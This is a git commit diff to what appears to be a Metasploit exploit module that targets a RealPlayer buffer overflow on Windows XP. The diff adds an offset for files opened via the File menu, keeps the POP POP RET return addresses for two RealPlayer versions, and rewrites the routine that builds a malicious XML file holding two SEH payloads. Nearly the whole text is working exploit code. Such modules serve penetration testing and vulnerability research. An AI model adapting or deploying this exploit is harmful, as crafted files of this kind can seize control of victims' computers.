Added support for opening via menu.

sgabe · sgabe · commit f687a1453964 · 2013-12-24T03:12:49.000+01:00
diff --git a/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb b/modules/exploits/windows/fileformat/realplayer_ver_attribute_bof.rb
@@ -49,16 +49,16 @@ def initialize(info = {})
         [
           [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.3.51',
             {
-              'Offset' => 2540,
-              'Ret'    => 0x641930c8, # POP POP RET from rpap3260.dll
-              'Max'    => 3095,       # overflow occurs at 3080 byte
+              'OffsetClick' => 2540,       # Open via double click
+              'OffsetMenu'  => 13600,      # Open via File -> Open
+              'Ret'         => 0x641930C8, # POP POP RET from rpap3260.dll
             }
           ],
           [ 'Windows XP SP2/SP3 (NX) / Real Player 16.0.2.32',
             {
-              'Offset' => 2540,
-              'Ret'    => 0x63A630B8, # POP POP RET from rpap3260.dll
-              'Max'    => 3095,       # overflow occurs at 3080 byte
+              'OffsetClick' => 2540,       # Open via double click
+              'OffsetMenu'  => 13600,      # Open via File -> Open
+              'Ret'         => 0x63A630B8, # POP POP RET from rpap3260.dll
             }
           ]
         ],
@@ -76,16 +76,15 @@ def initialize(info = {})
 
   def exploit
 
-    sploit = "<?xml version=\"";
-    sploit << rand_text_alpha_upper(target['Offset'])
+    sploit =  rand_text_alpha_upper(target['OffsetClick'])
     sploit << generate_seh_payload(target.ret)
-    sploit << make_nops(target['Max']-sploit.length)
-    sploit << "\"?>";
+    sploit << rand_text_alpha_upper(target['OffsetMenu'] - sploit.length)
+    sploit << generate_seh_payload(target.ret)
+    sploit << rand_text_alpha_upper(17000) # Generate exception
 
     # Create the file
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-
-    file_create(sploit)
+    file_create("<?xml version=\"" + sploit + "\"?>")
 
   end
 end
